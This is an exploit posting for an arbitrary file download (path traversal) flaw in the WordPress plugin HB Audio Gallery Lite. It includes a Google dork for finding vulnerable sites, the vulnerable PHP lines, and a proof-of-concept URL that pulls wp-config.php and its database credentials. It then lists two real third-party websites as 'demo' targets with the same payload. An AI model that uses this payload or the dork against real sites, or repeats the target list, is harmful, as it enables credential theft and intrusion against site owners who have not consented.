# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
# We Are Iranian An/
# Exploit Author: Hacker Khan
# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite
# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/
# Tested on: MSWin32
# Version: 1.0.0
 ############
# Vuln file : gallery/audio-download.php

11.   if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) {
13.       $file_size =  $_REQUEST['file_size'];
15.       $file =  $_REQUEST['file_path'];
17.       $filename = basename($file);
....
55.         Header("Content-Disposition: attachment; filename='" . $filename . "'");

#####################
# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

####################
Demo:

www.frenchandindianwarfoundation.org//wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

www.jampettahmethodist.org/mobile/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
##########################
[+] Thanks to : MR.Khatar |||| ll_azab-siyah_ll || iran || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D
[+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous .